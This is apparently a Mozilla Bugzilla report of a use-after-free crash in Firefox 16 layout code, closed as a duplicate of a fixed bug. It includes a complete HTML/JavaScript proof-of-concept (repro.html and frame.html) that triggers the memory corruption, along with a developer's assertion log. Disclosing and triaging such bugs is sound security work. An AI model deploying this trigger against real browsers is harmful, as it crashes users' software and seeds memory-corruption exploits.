Status

()

defect
--
critical
RESOLVED DUPLICATE of bug 765409
7 years ago
4 years ago

People

(Reporter: abbGZcvu_bugzilla.mozilla.org, Unassigned)

Tracking

({crash})

16 Branch
x86_64
Windows 7
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

Attachments

(1 attachment)

551 bytes, application/octet-stream
Details
Reporter

Description

7 years ago
Posted file repro.zip
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4

Steps to reproduce:

The below files trigger a use-after-free in Firefox 16.0.1, causing it to crash when tries to accesses data through a poisoned frame. frame.html can trigger the issue by itself, and repro.html is not required but does make it easier to trigger the access violation.

--- repro.html ---
<html xmlns="http://www.w3.org/1999/xhtml">
  <body>
    <iframe src="frame.html"></iframe>
  </body>
</html>

--- frame.html ---
<!DOCTYPE html>
<fieldset><x dir="rtl">
<script id="y" type="text/javascript">
  var oScriptElement = document.getElementById("y");
  oScriptElement.parentNode.removeChild(oScriptElement);
  var oHtml = '<x>' +
                '<x id="x"></x>' +
                ' ' +
                '<img alt="AAAAAAAAAAAAAAAAAAAAAA c">' +
                '<x>' +
                  ' ' +
                  '<x dir="ltr">';
  document.write(oHtml);
  document.documentElement.offsetTop;
  var oElement = document.getElementById("x");
  oElement.textContent = 'x';
</script>



Actual results:

Attempt to read from unallocated arbitrary memory (@0xF0DE8133) in xul.dll!nsLineLayout::ReflowFrame


Expected results:

No crash
Component: Untriaged → Layout
Product: Firefox → Core

Comment 1

7 years ago
I can reproduce the crash in mozilla-beta and -release debug builds on Linux64,
but not -aurora or trunk.  Before the crash I got these assertions:

###!!! ASSERTION: unexpected flow: 'mFrames.ContainsFrame(nextInFlow)', file layout/generic/nsInlineFrame.cpp, line 500
###!!! ASSERTION: StealFrame: can't find aChild: 'removed', file layout/generic/nsContainerFrame.cpp, line 1210
###!!! ASSERTION: StealFrame failure: 'NS_SUCCEEDED(rv)', file layout/generic/nsContainerFrame.cpp, line 1339

which points to bug 765409.  After applying the patch there, the crash
and assertions are gone.  (The fix will land on -beta (Fx17) soon)
Severity: normal → critical
Status: UNCONFIRMED → RESOLVED
Closed: 7 years ago
Keywords: crash
Resolution: --- → DUPLICATE
Duplicate of bug: 765409
Group: core-security
You need to log in before you can comment on or make changes to this bug.